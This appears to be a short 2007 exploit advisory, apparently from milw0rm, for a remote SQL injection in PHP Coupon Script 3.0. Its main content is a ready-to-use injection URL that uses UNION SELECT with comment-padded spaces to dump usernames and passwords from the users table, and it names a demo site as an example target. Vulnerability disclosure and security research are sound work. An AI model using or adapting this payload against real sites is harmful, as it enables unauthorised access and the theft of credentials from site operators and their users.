24 lines
No EOL
671 B
Text
24 lines
No EOL
671 B
Text
==============================================
|
|
|
|
PHP Coupon Script 3.0 Remote SQL Injection
|
|
|
|
==============================================
|
|
|
|
Found: Cyber-Security.org
|
|
|
|
==============================================
|
|
|
|
Script site: http://www.couponscript.com/
|
|
|
|
==============================================
|
|
|
|
Exploit:
|
|
index.php?page=viewbus&bus=-1/**/union/**/select/**/null,null,null,username,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/from/**/users/*
|
|
|
|
==============================================
|
|
|
|
Example: http://www.couponscript.com/demo/
|
|
|
|
==============================================
|
|
|
|
# milw0rm.com [2007-05-03] |